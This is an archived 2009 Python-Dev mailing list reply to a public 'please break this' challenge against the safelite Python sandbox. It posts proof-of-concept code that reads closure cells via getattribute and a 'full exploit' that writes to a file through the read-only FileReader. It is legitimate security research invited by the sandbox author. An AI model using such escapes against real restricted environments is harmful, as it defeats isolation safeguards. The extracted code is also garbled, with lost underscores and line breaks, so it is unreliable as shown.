[Python-Dev] Challenge: Please break this! [Now with blog post] (original) (raw)
Victor Stinner victor.stinner at haypocalc.com
Tue Feb 24 01:31:55 CET 2009
- Previous message: [Python-Dev] Challenge: Please break this! [Now with blog post]
- Next message: [Python-Dev] Challenge: Please break this! [Now with blog post]
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Le Monday 23 February 2009 23:41:30, vous avez écrit :
http://tav.espians.com/a-challenge-to-break-python-security.html
Please blog/retweet and of course, try the challenge yourselves =)
The challenge can be seen as: is it possible to read "secret" in the following code without using b.func_code, b.func_globals or b.func_closure:
def a(): secret = 42 def b(): print(secret) return b
b = a() secret = ???
With func_xxx, it's possible to get the secret with:
def get_cell_value(cell): return type(lambda: 0)((lambda x: lambda: x)(0).func_code, {}, None, None, (cell,))()
secret = get_cell_value(b.func_closure[0]) # 42
Function found at: http://code.activestate.com/recipes/439096/
But how can we get the closure if b.func_closure doesn't exist? Oh, wait! What's this: b.getattribute...
secret = get_cell_value(b.getattribute('func_closure')[0])
About FileReader, a full exploit:
from safelite import FileReader
def get_cell_value(cell): return type(lambda: 0)((lambda x: lambda: x)(0).func_code, {}, None, None, (cell,))()
Create 'w' string which is equals to 'r'
class Mode(str): def str(self): return self def eq(self, x): return x == 'r' mode = Mode('w')
f = FileReader('0wn3d', 'w') fileobj = get_cell_value(f.tell.getattribute('func_closure')[0]) fileobj.write('twice!\n') f.close()
-- Victor Stinner aka haypo http://www.haypocalc.com/blog/
- Previous message: [Python-Dev] Challenge: Please break this! [Now with blog post]
- Next message: [Python-Dev] Challenge: Please break this! [Now with blog post]
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]